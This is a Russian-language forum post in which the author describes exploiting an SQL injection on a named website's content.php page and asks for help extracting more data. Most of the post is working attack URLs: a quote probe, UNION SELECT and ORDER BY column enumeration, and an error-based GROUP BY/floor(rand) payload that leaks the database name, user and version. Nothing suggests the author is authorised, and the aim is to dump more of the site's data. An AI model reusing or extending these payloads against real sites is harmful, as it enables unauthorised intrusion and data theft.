Нарвался на одну интересную скулю.
Код:
http://sotchi-2014.info/content.php?id=1'
Пробовал сначала крутить через union, но скрипт грязно ругнулся
Код:
http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+
The used SELECT statements have a different number of columns
В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.
Но опять же следующий запрос выводится корректно
Код:
http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+ TRUE
http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+ FALSE
Что навело на мысль, что колонка всё таки 1.
Далее попробовал крутануть через другой метод.
Код:
http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database()),floor(rand(0)*2))+having+min(0)+or+1+--+
БД, юзверя, и версию выводит корректно.
На попытку вывести что либо ещё ругается на СЕЛЕКТ.
Подскажите, каким путём докрутить данную скулю ?